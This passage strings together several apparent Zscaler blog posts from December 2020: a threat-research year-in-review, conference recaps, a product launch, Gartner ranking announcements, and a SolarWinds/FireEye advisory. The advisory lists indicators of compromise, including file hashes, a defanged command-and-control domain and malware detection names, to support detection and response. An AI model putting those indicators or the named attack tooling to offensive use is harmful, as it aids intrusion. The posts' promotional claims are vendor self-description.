on the Google domains and These campaigns use SSL certificates issued by and and have well-designed login pages that attempt to spoof popular brands widely used in business, such as Dropbox Business, Microsoft Outlook and SharePoint, and DocuSign. They are designed to capture login credentials, which are sent to a remote server. In September, the Zscaler ThreatLabZ team found seventeen applications in the Google Play store containing the Joker malware. The easy availability of those apps (which were downloaded 120,000 times) represents a significant threat to Android users. Perhaps more troubling is how easily attackers are (still) able to sneak malware-hiding apps through Google’s vetting process. In October, the Zscaler's ThreatLabZ team discovered Chinese state-sponsored threat actor APT 31 was responsible for several malicious binaries hosted on attacker-controlled GitHub accounts. These binaries dropped and displayed decoy content using a COVID-19 vaccine theme as a social engineering technique. Present malfeasance This year especially created a massive uptick in online activity. Cybercriminals are taking advantage of this increase and looking for ways to exploit it: With the holidays come Black Friday, Cyber Monday, and other enticements to lure consumers into buying products online. Zscaler noticed attackers taking advantage of this holiday activity for their targeted cybercrimes. Cybercriminals have always targeted Cyber Monday and Black Friday with phishing scams, malware attacks, and injecting malicious card skimmers into compromised e-commerce sites to steal payment card information. ThreatLabZ researchers saw a sudden spike in cyberattacks during the weeks leading to Cyber Monday (as expected), anticipating that the trend would continue in December. With most companies adopting some sort of public cloud offerings, ThreatLabZ analyzed the current state of Cloud (in)security. Cloud vendors have enormous security resources available, yet barely a day goes by without news of another cloud security incident. Most of these incidents can be traced back to the insecure use of cloud services rather than security flaws in the services themselves. ThreatLabZ found a fake version of the hugely popular game Among Us in the Google Play store. The phony app is titled Amoungus and is just adware. After downloading, the app bombards the user with advertisements. The app asks users to log in or register using Gmail credentials, but the current version does not send the attacker credentials. Future concerns The ThreatLabZ team not only keeps track of the past and present but also looks to the future with some predictions on cybersecurity issues we might see in 2021: The 2020 rush to remote work will fuel massive breaches in 2021. COVID-19 concerns forced many enterprises to set up nearly all employees with remote work. Organizations that didn’t properly configure their security architecture (cloud-native SASE architecture) for a distributed workforce expanded their attack surface and are ripe for cybercrime. Now that the dust is settling on the shift, we’ll start to see data breaches due to poorly thought-out security and corporate devices coming “in from the cold” bringing malware with them. Ransomware will be treated as a data breach. Organizations must come to grips with the surging sophistication of cyberattacks and ransomware as a company-wide responsibility, not just a CISO issue. Company-wide ransomware playbooks and response plans will dictate exactly what to do and how to mitigate any damage to the brand and address compliance matters related to leaked or stolen data. Cybercriminals will target specific markets. Pharmaceutical, biotech, and healthcare companies will see increases in targeted nation-state attacks. Cybercriminals’ goal will be stealing intellectual property, PHI data, and credential-skimming through targeted phishing campaigns that align with public interests (such as COVID-19 developments and breakthroughs). We will continue to see fallout from the SolarWinds supply chain attack (and others like it). On Dec. 12, 2020, FireEye provided detailed information on a widespread attack campaign involving a backdoored component of the SolarWinds Orion platform, which organizations use to monitor and manage IT infrastructure. Attackers will continue to attempt breaches that exploit compromised infrastructure software. Public clouds will continue to be a source of attack propagation. The increase of enterprise public cloud consumption will increase attacks hosted in public cloud resources. The only way to protect against these attacks is by maintaining a secure cloud workload. The need for cybersecurity expertise will grow more critical. There is an extreme skills shortage in cybersecurity and a massive gap between what we have and what we need. Understanding how to protect corporate assets in the cloud- and mobile-first world requires training and dedication. Enterprises would do well to increase resources for cybersecurity training programs and partners. Zscaler manages the world’s largest security cloud. Each day, Zscaler blocks more than 100 million threats to its 4,000+ customers. Using state-of-the-art AI and machine-learning technology, the Zscaler ThreatLabZ security research team analyzes Zscaler Zero Trust Exchange traffic and shares its findings. The Zscaler ThreatLabZ team wishes a happy and secure 2021, everyone! Thu, 17 Dec 2020 14:31:54 -0800 Deepen Desai My Highlights from Zenith Live 2020 APJ Day Two This post also appeared on LinkedIn. Zenith Live 2020 has come to an end, but only after two days of engaging secure digital transformation customer stories, Zscaler cloud platform product innovations, hands-on architectural deep-dives, and some exciting keynotes. This year, Zenith Live went virtual, with sessions available online (and for free). That served to make the sessions all the more personal, since every speaker was seemingly in the room with me. Below, my highlights from day two. Yesterday, Zscaler President and CTO shared Zscaler’s new innovations in CASB and DLP technology. Today, he kicked off the event with a session titled “Cyberthreats and Cloud Protection Innovations,” and began with the announcement of Zscaler Cloud Protection, an exciting new feature that secures enterprise applications and workloads. He also introduced Jeremy Embalabala, VP of Information Security for insurance brokerage firm HUB International. Jeremy has led secure digital transformation initiatives at HUB, and the switch to Zscaler (and the cloud) has improved both security and transparency. After HUB adopted Zscaler Internet Access (ZIA), explained Jeremy, “[w]e gained new insight into our traffic flow. We were able to understand and categorize what type of traffic was flowing across our network, when previously we didn't have any visibility.” After Amit, we heard from IT leaders with Zscaler customer Takeda Pharmaceutical Company. The Tokyo-based firm is the oldest pharmaceutical company in the world, and is celebrating its 240th birthday! CISO Mike Towers shared the company’s secure digital transformation journey to a zero trust architecture. He noted that Takeda works with more than 30,000 partners, and “nearly a quarter” of them present some level of cybersecurity risk. “The B2B area and the partner ecosystem,” said Mike, “ is another area where zero trust is something that we absolutely need.” Zscaler has been a long-time development partner with Microsoft: The two companies’ cloud technologies complement each other to deliver benefits to enterprise customers. In a partner session today, Microsoft CVP Alex Simons provided an overview of Microsoft and Zscaler components of a unified zero trust architecture, and even invited some joint customers to join him. Matthias Quernheim, Head of Global Connectivity and Security Solutions with French pharmaceutical company Sanofi expressed great appreciation for the way cloud services from the two companies have benefitted his company. “In total,” he said, “we are really happy that we made the right decisions in 2019 going with Zscaler and Microsoft.” In the afternoon keynote, Andy Greenberg—a Wired Magazine reporter and author of the book Sandworm—described his experience tracking notorious cyberattacks on Ukraine power infrastructure and the 2018 Olympics, as well as the genesis of the NotPetya malware release. His story (particularly the detective work behind tracing the attacks to the Russian state-sponsored Sandworm group) was gripping, but he offered some hope in the face of daunting cyber terror. “In this new era of hyper-sophisticated cyber war teams and highly motivated, well-resourced, for-profit ransomware cyber-criminal gangs carrying out targeted attacks,” explained Andy, “we may not be able to avoid being vulnerable...but we can be resilient against them.” I hope you were able to attend and enjoy Zenith Live 2020. If you missed anything (today or yesterday), visit to view event session recordings. And keep an eye out for a future invitation to Zenith Live 2021. It might not be quite as virtual as this year’s event, but I’m sure it will be just as inspiring. Wed, 16 Dec 2020 01:00:02 -0800 Sudip Banerjee Zscaler Expands Kiwi Offerings as Microsoft Announces New NZ Region New Zealand is already home to Lord of the Rings and the formidable All Blacks rugby team, and now it has another powerful asset. To better support Zscaler’s growing client base in the land of the long white cloud, we have created a local deployment of Zscaler Private Access (ZPA). With the announcement of the first Microsoft data centre region in the country, ZPA enables clients to take full advantage of a Zero Trust Network Access (ZTNA) security strategy. ZTNA provides a secure and scalable alternative to traditional Virtual Private Networks (VPNs) and is designed with remote workers in mind. That’s something especially relevant in the current reality of the COVID-19 pandemic. ZTNA makes an enterprise’s most precious digital assets go dark to the outside world. Unless a user has the authority to access an application or data store, they won’t be able to see that it exists. This significantly improves infrastructure security. The new ZPA capabilities, deployed with the support of local technology partner The Instillery, builds on Zscaler’s existing presence in the country. Since 2018, we have provided secure internet services from a local data centre, and this additional capability takes our offering to new heights. The launch of ZPA within this new Microsoft region comes at a time when trends such as cloud platforms, Software-as-a-Service (SaaS), and mobility are reshaping workplaces. The move delivers our clients more support at a time when they need it most. By delivering a ZTNA capability, ZPA gives users secure access to both existing on-premises applications and resources as well as those running on external cloud-based platforms. Performance is not affected, as is often the case when users rely on traditional VPNs. Zscaler’s expanded capabilities in New Zealand will assist both public and private sectors in their journeys toward a cloud-based future. It will also deliver the opportunity to reduce infrastructure costs, improve security, and increase operational agility. The combination of Zscaler and the Microsoft New Zealand Data Centre Region is big news for our current and future clients. As the only cloud security company that is a Microsoft certified networking partner for Microsoft 365, we are able to deliver a compelling package of services to organisations of all sizes. To find out more about how ZPA can deliver value to your organisation, reach out to us today. Wed, 16 Dec 2020 08:00:01 -0800 Clive Levido Zenith Live 2020 APJ First Day Signals a “New Era” of Secure Digital Transformation This post also appeared in LinkedIn. We’ve just completed day one of Zenith Live 2020 for the Asia-Pacific region. It was a day of inspiring presentations, innovative product demos, and even an astronaut! Zenith Live looks different this year: It has “gone virtual,” with all sessions available online (and free of charge). Though they weren’t speaking on an actual stage, speakers were engrossing, inspiring, and enthusiastic during the first sessions of this year’s premier global cloud summit. Zscaler CEO Jay Chaudhry started the day with his keynote address, in which he made the point that the enterprise digital transformation requires a zero trust architecture. He noted this “new era” we have entered, where users work from everywhere, data traffic grows exponentially, the cloud is the new data center, and the internet is the new corporate network. Jay also offered an overview of the Zscaler Zero Trust Exchange platform, and emphasized its four key pillars to drive secure digital transformation: Secure internet and SaaS access, secure private app access, digital experience, and protected apps and workloads. In the next session, Zscaler President and CTO Amit Sinha and CIO Patrick Foxhoven shared some of the exciting new Zscaler product and service innovations. Amit shared the Zscaler “Blueprint for secure digital transformation,” with the key message: It’s time to prioritize platform over point products. He provided technical details of Zscaler integration with partner identity management, endpoint protection, cloud provider, SD-WAN, and security operations solutions. In that same session, we heard from Steve Day, EGM for Infrastructure with National Australia Bank (NAB). Steve told of NAB’s secure digital transformation journey from legacy hardware to the cloud. “Zscaler, and ZPA in particular turned out to be a really good fit for us,” said Steve. “We're now no longer trying to secure networks across 800 locations across Australia. We're just defending individual applications now at the gateway to those applications, which is really the promise of zero trust.” CEO Jay Chaudhry next led a “Voice-of-the-Customer” session with several IT leaders from Siemens, including CIO Hanna Hennig, Head of IT Infrastructure Markus Holzheimer, VP of IT Strategy & Governance Frederik Janssen, and Head of DEC Anthony Atherton. They talked about fostering agility and resilience, two things that can be challenging to achieve in a time of crisis. Yet—in response to the recent pandemic—Siemens was able to pivot quickly to remote work. Hanna, Markus, Frederik, and Anthony led that charge, enabling more than 300,000 employees to work securely from anywhere, with a little help from Zscaler Private Access (ZPA) of course. Zscaler EVP of Customer Experience and Transformation Kavitha Mariappan interviewed Captain Scott Kelly, a former U.S. Navy fighter pilot and astronaut, noted for holding the record for time spent in outer space. Captain Kelly talked about how he pushed himself beyond limits to achieve his (lofty) goals. He also described in detail what it was like to pilot a spacecraft outside of earth’s atmosphere. Zenith Live is known for its breadth of breakout sessions, and this year featured some engrossing customer presentations, partner sessions, and hands-on training. Some popular session topics included a Zscaler Cloud Firewall demo, technical deep-dive into the Zscaler Client Connector, and best practices for network transformation. One session was particularly well-attended: Zscaler Solution Architect Takayoshi Takaoka offered an interactive architectural whiteboard workshop on “Application Transformation for Zero Trust.” Zscaler Director of Transformation Strategy Lisa Lorenzin moderated a panel composed of Asia-Pacific-region IT leaders for the session “Women in IT: Confidence and Collaboration Bring IT Career Success." Lisa was joined by Firuza Karimova, Head of Malware Protection & Network Security for Standard Chartered Bank; Indrani Chandrasegaran, Managing Director of Accenture Security with Accenture; and Jody Davids, former CIO at PepsiCo. They talked about their experience navigating the enterprise IT world, and shared advice for skills development, career advancement, and building support networks. Zenith Live 2020 continues tomorrow at 8:00 AM SGT. (There’s still time to register, by the way!) We’ll hear from Andy Greenberg, the author of Sandworm, who will share his experience tracking the NotPetya malware outbreak. There will also be product innovation news, and customer journey stories from innovative organizations like Takeda Pharmaceutical Company, Sanofi, Unilever, and many more. I hope you can join me for day two! Tue, 15 Dec 2020 01:00:01 -0800 Scott Robertson Mission Accomplished: Zenith Live 2020 Goes Beyond Limits This post originally appeared on LinkedIn. We’ve just wrapped the general sessions for Zenith Live 2020 for the Americas region, and what an event it was all around! Things were a little different this year as the premier global cloud security summit went virtual, yet moving the event online made it even more engaging, with every attendee enjoying a front-row seat. The event allowed for multiple tracks and greater depth for all attendees in various roles across the IT landscape. Listening to customers describe how Zscaler has accelerated their digital transformations, and seeing all of our partners who helped us contribute to our joint customers’ journeys—it was both powerful and humbling. It was also exciting, as it validated for all of us that this is the right time and the right platform to help customers drive transformation success at pace and scale. Customers provided the most inspiring moments at Zenith Live Innovating is in our DNA, but there’s nothing like hearing from customers employing those innovations in the real world. Steven Hernandez, Director of Information Security with Driscoll’s, shared at Zenith Live how the berry-production conglomerate employs Zscaler Cloud Protection to secure data traffic throughout its complex logistics workflows. “We're able to securely manage, monitor, and protect our data and workloads in record time,” explained Steven, “in a fraction of the time of any other solution, without slowing down the business.” Also on the mainstage of Zenith Live was an illuminating “Voice-of-the-Customer” presentation from Takeda Pharmaceutical Company. CISO Mike Towers and Global Head of Intelligence, Analytics, and Response Brent Ball described in detail how the company’s secure digital transformation has delivered tangible business benefits. “[Zero Trust] empowers our workforce to operate from wherever,” said Brent, “to improve their productivity, while maintaining—and in many cases, improving—technology controls and proactively mitigating threats against the organization. Zscaler’s mission was always to go beyond limits When Zscaler was founded in 2008, dozens of vendors were vying to become security leaders, offering bigger boxes and doubling down on legacy approaches. Our CEO and founder Jay Chaudhry and his team were never interested in “improving” the status quo; rather, we looked beyond the technology of the day and took a different route, changing cybersecurity entirely. The mission was to address the new challenges organizations were facing with growing cloud adoption, remote work, and mobile concerns. Zscaler developed a global, massively scalable cloud architecture to help accelerate and secure enterprise customers’ digital transformation. The Zscaler Zero Trust Exchange, a platform through which all connections are securely and intelligently routed, is the world’s largest inline security cloud. Our Zero Trust Exchange cloud processed 10 million transactions, enforced 45,000 policies, and blocked over 6,000 threats in the time it took to read this sentence. Network security vendors used to dismiss our expanding portfolio of cloud security services, but are now racing to catch up as they try and pivot their products and business models. Other vendors are scrambling to prepare for a world where work is no longer tied to a place, and the internal network is no longer the center of gravity. Zscaler was built for this new world. My mission: Build a GTM team without limits Since I joined Zscaler, I’ve made it my mission to recruit team members with the right combination of grit, enthusiasm, and intellectual curiosity. We are growing rapidly, and it is more important now than ever to find innovative people to help us scale the impact we drive for customers. World-class GTM is a team sport. It requires everyone across the organization to be working from the same playbook. Our goal is to build a scalable platform for development and growth that enables success at Zscaler and beyond, for all our teams and our partners. I’m incredibly proud of what we’ve been able to accomplish with our programmatic Sales Strategy and Process, elite Enablement programs, and comprehensive Revenue Ops model. We are disrupting the way security is delivered and sold. It’s not easy to be disruptive. It’s much harder to sell a platform than a point product. But I promise you this: Nothing compares to the satisfaction of driving quantifiable value while solving significant challenges for our customers. This is what customers need right now and we are built to deliver these massive transformational gains. If working with grit and optimism, helping customers succeed no matter the challenges, and going beyond limits is your ethos, take a look at our career opportunities—we’re hiring across the entire GTM organization. We are committed to continuously developing our people across all levels and teams, as that is what top talent deserves, and that is what helps us drive impact for our customers. Wed, 09 Dec 2020 17:28:19 -0800 Dali Rajic Zscaler Coverage for SolarWinds Cyberattacks and FireEye Red Team Tools Theft Update On Dec 13, 2020, FireEye published additional details regarding the breach involving SolarWinds Orion supply chain attack where multiple other organizations were also impacted. FireEye also published countermeasures to detect the campaign at various stages here. Zscaler Coverage Zscaler leveraged the details on the countermeasures provided, verified that there is existing protection and enhanced the coverage wherever required across the multiple layers of Zscaler security platform. Below is the list of threat names through which Zscaler products detect this campaign. Advanced Threat Protection Win32.Backdoor.SunBurst Win32.Backdoor.BEACON Malware Protection PS.Trojan.COSMICGALE Win64.Dropper.TearDrop Win32.Webshell.SuperNova [attribution not confirmed] Win64.Trojan.TearDrop Win32.Trojan.Sunspot Win32.Backdoor.CobaltStrike Win64.Backdoor.RainDrop [attribution not confirmed] Details regarding these threat signatures can be found in the Zscaler Threat Library. Advanced Cloud Sandbox We have ensured that Zscaler Cloud Sandbox flags the Sunburst Backdoor. As always, Cloud Sandbox plays a critical role in blocking any unknown variants of the malware. Zscaler ThreatLabZ team is also actively monitoring this campaign and any activity around Sunburst Backdoor and will ensure coverage for newer IOCs as they are discovered. What is the impact? According to SolarWinds, 18,000 of its customers downloaded the backdoored version of the Orion software during March 2020 through June 2020 including many large enterprises and government agencies. Is Zscaler affected? Zscaler utilizes SolarWinds software and verified that none of our services are affected by this campaign. We published a trust advisory here: What can you do to protect yourself? If you are using SolarWinds Orion framework in your environment, then check if the software version running is vulnerable (2019.4 HF 5 and 2020.2 with no hotfix or 2020.2 HF 1) and update it to the latest version, according to the advisory here. Also, check if you are running any other affected SolarWinds products as listed in their advisory. Detection Steps: Search for the following on SolarWinds server: Any file named “SolarWinds.Orion.Core.BusinessLayer.dll” (with one of the hash: 2c4a910a1299cdae2a4e55988a2f102e,846e27a652a5e1bfbd0ddd38a16dc865, b91ce2fa41029f6955bff20079468448) File location: “C:\WINDOWS\SysWOW64\netsetupsvc.dll” Scan all the files (from step 1) with Yara using the FireEye SunBurst rules If there is a match, then it is possible that your environment has been affected. Follow the Incident Response guidelines by: Isolating or disconnecting or powering down the system Resetting all credentials used by SolarWinds Search the logs for any connections to *.avsvmcloud[.]com or any activity flagged by above Zscaler threatnames. Also, review additional recommendation guidelines from DHS and Microsoft. Zscaler Platform Best Practices: Route all server traffic through Zscaler Internet Access, which will provide the right visibility to identify and stop malicious activity from compromised SolarWinds servers. Restrict traffic from critical infrastructure to an allow list of known-good destinations Ensure you are inspecting all SSL traffic. Turn on Advanced Threat Protection to block all known command-and-control domains. Extend command-and-control protection to all ports and protocols with the Advanced Cloud Firewall (Cloud IPS module), including emerging C2 destinations. Use Advanced Cloud Sandbox to prevent unknown malware delivered as part of a second stage payload. Limit the impact from a potential compromise by restricting lateral movement with identity-based micro-segmentation (Zscaler Workload Segmentation) and a Zero Trust architecture. Safeguard crown jewel applications by limiting lateral movement using Zscaler Private Access. Zscaler has your back. Engage with our security experts to gain insight into the SolarWinds attacks and get hands-on best practices guidance to better protect your users, applications, and systems: [-- End of Update --] Background On Dec 8, 2020, FireEye released a public disclosure that the company had suffered a data breach involving a nation-state actor. More details about this disclosure can be found here and here. The adversary was able to steal several red team tools developed by FireEye during this attack. As part of the disclosure, FireEye also released IOCs and signatures for detecting abuse of these red team tools in the wild. In this coverage advisory, we will provide details about Zscaler’s coverage for these IOCs. What is the issue? The red team tools that were stolen as part of this breach were internally developed by FireEye to test its customers’ security. These tools exhibit behavior similar to many known cyberthreat actors and do not contain any zero-day exploits or unknown techniques. According to FireEye, these tools utilize well-known/documented methods that are used by other red teams and they do not assist in greatly advancing an attacker’s overall capabilities. Many of these tools are exploiting several known Remote Code Execution (RCE) vulnerabilities across different products commonly found in enterprise networks such as legacy VPN products and several Microsoft applications. A full list of CVEs can be found here. Regardless of whether these tools may or not be abused by an adversary in the future, it is important to ensure detection for any usage of these tools and minimize the potential damage. What can you do to protect yourself? Ensure that your users always have the Zscaler Client Connector running to ensure coverage against these exploits. We highly recommend ensuring you have the latest security updates installed for the products affected by these CVEs. It is equally important to have updated security software. Remote Desktop service access should always be restricted, or it should be turned off if not in use. As always, avoid opening suspicious emails containing attachments or links that come from any unknown sources. Disable macros in Microsoft Office applications. Do not enable them unless it is essential to do so. Enable multi-factor authentication (MFA) across both business and personal email accounts to thwart most credential-harvesting attacks. Zscaler coverage Zscaler leveraged the details on the countermeasures published by FireEye and validated that protection is already available for the majority of the vulnerabilities listed. Enhanced protection has been added wherever necessary across multiple layers of the Zscaler security platform. Below are the threat names of the existing detections: Advanced threat protection Win32.Exploit.CVE-2016-0167 Win32.Exploit.CVE-2017-11774 HTML.Exploit.CVE-2018-13379 HTML.Exploit.CVE-2018-15961 Win32.Exploit.CVE-2019-0604 Win32.Exploit.CVE-2019-0708 HTML.Exploit.CVE-2020-11510 HTML.Exploit.CVE-2020-11580 Linux.Exploit.CVE-2019-19781 HTML.Exploit.CVE-2019-8394 Win32.Exploit.CVE-2020-0688 HTML.Exploit.CVE-2020-10189 Win64.Exploit.CVE-2020-1472 Win32.Exploit.CVE-2020-1472 Win32.Backdoor.GoRAT VBS.Dropper.DNSExfiltration Win64.Backdoor.CobaltStrike Win32.Backdoor.BEACON Malware protection Win32.Trojan.Heracles Win32.Trojan.LodKatz Win32.Trojan.Razy Win32.Trojan.Usru Win32.Downloader.CobaltStrike Full list of threat names to detect FireEye's Red Team Tools abuse can be seen here. Details related to these threat signatures can be found in the Zscaler Threat Library. Advanced Cloud Sandbox We have ensured that Zscaler Cloud Sandbox flags these red team tools. As always, Cloud Sandbox plays a critical role in blocking any custom variants that may be developed from these stolen tools. The Zscaler ThreatLabZ team is also actively monitoring abuse attempts involving these red team tools and will ensure coverage for newer IOCs as they are discovered. Wed, 09 Dec 2020 14:00:00 -0800 Amit Banker Zscaler is the ONLY Leader in the Magic Quadrant I am thrilled about the massive milestone Zscaler has achieved this week with the 2020 Gartner Magic Quadrant for Secure Web Gateways. It is an achievement every entrepreneur dreams of. It starts with the moment when you realize a fundamental change is about to reshape the world. And as entrepreneurs and visionaries, you tie that to a shift in the very basis of how certain capabilities were built or necessitated. It is a long road from there...from realization to implementation, and then an even longer road of execution to show and gain the confidence of the marketplace. Ten years in, it is amazing to see how well the Gartner Magic Quadrant demonstrates that journey. Our first year in the Magic Quadrant was 2011—the market was saturated with numerous vendors, with five in the Leaders quadrant alone. SWG was largely URL filtering and antivirus. However, everyone knew that as internet usage increased, SWG would have to expand to become the DMZ of choice for most organizations. However, all this was expected to be done on appliances in a host of shapes and sizes. Peter Firstbrook and Lawrence Orans had realized that the future was cloud, but it was only a visionary idea. I remember flying with Jay to meet Peter in a small frozen town in Canada to whiteboard ideas for an advisory day. The many conversations with Lawrence over the future of networking in Connecticut. At the time, the Magic Quadrant questionnaire had fewer than five questions (out of 100+) that asked about a cloud form factor. Propelled by Jay’s extraordinary vision and conviction, Zscaler entered that world with a bold, one-of-a-kind born-in-the-cloud product portfolio that rivaled the best appliances. In the very first year, Zscaler secured a position in the Magic Quadrant as the furthest right on the visionary axis—a position Zscaler has proudly continued to own ever since. A new entrant can never beat legacy vendors for revenue or execution on day one. But a new entrant wins a market only if they have better vision and conviction of the future than everyone else. Otherwise, it is only a “me too.” Over the numerous years, our conviction was tested many times. For a company that was started in one of the worst recessions in the U.S., the journey was definitely not a cakewalk. As cloud, Microsoft Office 365, and mobility caught on, the need for a cloud form factor to protect employees became obvious. At the same time, the growth of SaaS, IaaS, and PaaS made it critical for the SWG to become the focal point of network protection. Clear trends like SSL everywhere meant the only relevant point for network protection is the proxy that can inspect all SSL traffic. This resulted in the SWG definition subsuming or adding many previously independent functions (with the Magic Quadrant questionnaire reflecting this change): Coverage for all ports and protocols (Cloud Firewall) Advanced malware detection with IPS, sandboxing, machine learning, and more Data loss prevention and CASB Coverage for handheld form factors (Android and iOS) Remote browser isolation technologies Zero trust As the market adopted this change, the Magic Quadrant has clearly reflected vendors that kept up and were recognized not only by Gartner for vision, but also by the market at large for execution. Through our early years, industry visionaries, including Larry Biagini at GE, saw the need for a new way to ensure the security of their massive organizations. The same realization was happening all over the world across organizations in every vertical. These early customers shaped the outcome of what the SWG needed to become. Each year as SWG became more complex and the importance of the cloud grew, the old leaders started to fall away. Each year, Gartner continued to push clear guidance of cloud being the future. To a point two years ago when the Magic Quadrant questionnaire had 90 percent of its questions focused on the cloud form factor. What a shift, and kudos to Gartner analysts for keeping their ears to the ground and staying one step ahead to guide the market. This year’s pandemic brought the changes Gartner has been espousing into sharp focus. Enterprises that had adopted new approaches—cloud-delivered security, zero trust, CASB, digital experience monitoring—were positioned to quickly enable their employees to work securely and remotely. Those companies that were relying on legacy technologies faced an uphill battle to scale for a fully remote workforce (on unmanaged devices), provide secure access to private apps, and protect data. It is with great pride that we see the Magic Quadrant released this week demonstrating Zscaler’s conviction and hard work paying off. We are the only Leader in the most important security product family that is subsuming all of the past network-based defenses. While we wholeheartedly embrace our role in creating innovative, “disruptive” technology, we’ve always measured our success by that of our customers, who have been keeping the world working, literally. They’re running multinational corporations with their employees safely at home. They’re running financial institutions, government agencies, healthcare systems, energy infrastructure, and much more. We’re immensely proud to serve thousands of organizations around the world and that they trust us to help them meet the challenges of the day while keeping their lifeblood—people, systems, and data—accessible and secure. Customer obsession is a core value at Zscaler, and while we will all spend a moment reveling in the 2020 Gartner Magic Quadrant, we will quickly get back to our work of empowering customers to transform securely to the digital future—no matter what it may bring. That’s the real prize. Please read the blog by Jay Chaudhry in which he responds to 10 years of Gartner Magic Quadrant leadership and this year’s position as the only Leader. And be sure to download your free copy of the Gartner report. Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, express or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose. This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from Zscaler. Gartner Magic Quadrant for Secure Web Gateways, Lawrence Orans, John Watts, 8th December 2020. Fri, 11 Dec 2020 12:55:22 -0800 Dr. Manoj Apte Zscaler: The Only Gartner Magic Quadrant Leader for Secure Web Gateways, 2020 I am truly humbled to share that Zscaler has been named the only leader in the 2020 Gartner Magic Quadrant for Secure Web Gateways, cementing 10 consecutive years of being recognized as a Leader. In addition to being this year’s only leader, Zscaler has been positioned the furthest overall in both “Ability to Execute” and “Completeness of Vision.” This achievement wouldn't have been possible without the progressive leaders who have embraced change as an opportunity to gain a competitive advantage, the amazing partners that have joined us on our mission, and of course, our Zscaler family, whose passion and hard work continues to inspire me. We founded Zscaler with the certainty that digital transformation would change entire industries, unlocking productivity gains and empowering organizations to become more agile, intelligent, and resilient. We had conviction that traditional approaches to network security would become irrelevant as users went mobile and applications moved off the network into the cloud, and legacy IT infrastructure was an inhibitor to transformation. We realized that effective security and data protection required SSL inspection at scale, and true cyber risk reduction meant eliminating your attack surface. Today, we see a massive acceleration in what we imagined more than a decade ago: the cloud-first enterprise is now a reality. When all that’s needed to run your business is a laptop or phone and an internet connection, the very backbone of networking and security must transform. We believe the Gartner Magic Quadrant highlights this fundamental shift from point solutions to a best-of-breed platform for better security and IT simplicity, which can only be delivered as part of a cloud-native proxy architecture. Through the Zscaler Zero Trust Exchange, we continue to deliver innovations that push the definition of the Secure Web Gateways category further than anyone thought possible, with Gartner highlighting: How our cloud-native proxy architecture enables us to apply malware detection to all content, including SSL/TLS traffic The addition of inline CASB for cloud application discovery and control, threat prevention and DLP integration, including adding API integration with popular SaaS providers to extend DLP to data-at-rest Our integration of Appsulate technology into Zscaler Internet Access (ZIA) for remote browser isolation Zscaler’s expansion into CSPM and digital experience monitoring (Zscaler Digital Experience) Each new capability further reinforces the power of our platform to enable secure digital transformation, integrating all key security capabilities needed for the cloud-first enterprise, including an industry-leading SASE framework. As always, our first priority is to serve our customers, with each new innovation designed to support them on their transformation journey. As a result, our momentum continues to accelerate, and we are proud to serve more than 4,500 customers in 185 countries, including more than 450 of Forbes Global 2000 organizations. As historic numbers of organizations embrace digital transformation, the Zero Trust Exchange is a secure investment for the future. This past decade has been the journey of a lifetime, and we couldn’t be prouder to have been recognized again by Gartner. To all of our customers, partners, and employees - I want to offer my sincere gratitude for your trust and support. I also want to extend my special appreciation to the forward-thinking leaders at Gartner, who question the status quo and push organizations to create highly differentiated, competitive offerings. Without their support, innovative companies like Zscaler would have a much harder time disrupting legacy technology. Over the years, I’ve had the privilege of working with Lawrence Orans, Peter Firstbrook, Neil McDonald, and many other thought-provoking Gartner analysts, whose conviction in a cloud-native future helped inspire me to keep expanding and growing the Zscaler platform. Ten years ago, I remember drawing my early vision for the Zscaler Zero Trust Exchange on a napkin over lunch with Peter in Thornbury, Ontario, and all the years of feedback with the Gartner team have continued to clarify and strengthen our offerings. As secure digital transformation accelerates, I know that Zscaler is just getting started. We invite you to download a complimentary copy of the 2020 Gartner Magic Quadrant Report for Secure Web Gateways here. Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, express or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose. This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from Zscaler. Gartner Magic Quadrant for Secure Web Gateways, Lawrence Orans, John Watts, 8th December 2020. Fri, 11 Dec 2020 09:06:15 -0800 Jay Chaudhry Zenith Live 2020 EMEA Day Two Highlights This post originally appeared on LinkedIn. That’s a wrap for day two of Zenith Live 2020 for the EMEA region. It’s been two days of compelling secure digital transformation customer journeys, architectural deep-dives, and the latest product and service innovations from Zscaler. Yes, things looked a little different this year, as every session moved online (and was made available for free). But going virtual only made the premier global cloud summit better, as every seat was in the front row. (Plus, I watched from the comfort of my couch.) Below, some of my day-two highlights. Like day one yesterday, we began day two of Zenith Live 2020 with some exciting product announcements from Zscaler President and CTO Amit Sinha, whose main-stage presentation was titled “Cyberthreats and Cloud Protection Innovations.” He shared details (and a demo) of Zscaler’s new Cloud Protection service that secures enterprise apps and workloads. He also talked about Zscaler ZDX, a feature that monitors performance, enabling enterprise IT leaders to measure, then optimize user experience. Amit introduced Reckitt Benckiser (RB) Director of Enterprise Architecture John Dawes, who has put ZDX into practice at the U.K.-based consumer goods multinational. John described how RB used Zscaler Private Access (ZPA) to enable remote work for its employees when COVID hit, and then how they’ve improved user experience for this new way of work. “ZDX has given us some great early insights,” said John. “We've identified some regional Office 365 issues, and on more than one occasion we've encouraged our colleagues to prioritize their own device on their home Wi-Fi network so Microsoft Teams works better." Following the product innovations session was an engaging “Voice-of-the-Customer” discussion on security transformation. Zscaler CISO and VP of Security Research Deepen Desai spoke with two IT leaders from shipping firm CMA CGM: Group CISO Michael Perrino and IT Security Architect Sebastien Lemieux. The two discussed the French shipping company’s secure digital transformation, and how they led the move from legacy security to a cloud-based zero trust architecture to protect 110,000 employees across 160 countries, 755 working locations, 750 warehouses, and almost 500 vessels. They also shared the dramatic story of how CMA CGM deployed ZPA to 27,000 customers in 48 hours to mitigate a ransomware attack in progress. In the sincere words of Microsoft Identity Division CVP Alex Simons, “Microsoft and Zscaler are partnering to help [customers] realize a true Zero Trust security model.” Alex spoke on the main stage, and talked about the “new world,” one that “needs a new philosophy for security.” He introduced Gerold Nagel, DB Schenker’s SVP of Global Infrastructure Services, who talked about the German logistic firm’s “cloud-first strategy,” an approach he described as “the key enabler for our digital transformation.” Gerold credited DB Schenker’s 